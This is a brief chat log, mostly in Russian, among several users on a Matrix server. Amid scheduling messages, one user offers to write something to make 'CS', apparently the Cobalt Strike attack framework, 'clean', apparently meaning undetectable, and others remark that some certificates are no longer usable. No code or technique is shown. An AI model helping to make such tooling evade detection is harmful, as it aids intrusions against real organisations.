[2024-01-26 17:19:28] @usernamegg:matrix.bestflowers247.online: создадим
--------------------
[2024-01-26 17:19:31] @usernamegg:matrix.bestflowers247.online: я чутка занят
--------------------
[2024-01-26 17:19:43] @usernamegg:matrix.bestflowers247.online: перепроверить надо ту юсу
--------------------
[2024-01-26 17:21:15] @usernameww:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 17:22:48] @usernameww:matrix.bestflowers247.online: vse tak zhe ( no connect
--------------------
[2024-01-26 19:00:13] @usernamegg:matrix.bestflowers247.online: уехали ?
--------------------
[2024-01-26 19:31:26] @cob_crypt_ward:matrix.bestflowers247.online: привет, CS еще нужен?
--------------------
[2024-01-26 19:31:33] @cob_crypt_ward:matrix.bestflowers247.online: хочу попробовать кое-что для него написать
--------------------
[2024-01-26 19:31:38] @cob_crypt_ward:matrix.bestflowers247.online: чтоб чистым был
--------------------
[2024-01-26 19:31:42] @cob_crypt_ward:matrix.bestflowers247.online: идея появилась
--------------------
[2024-01-26 19:32:27] @burito:matrix.bestflowers247.online: те серты всё, да?
--------------------
[2024-01-26 20:00:28] @usernamess:matrix.bestflowers247.online: да
--------------------
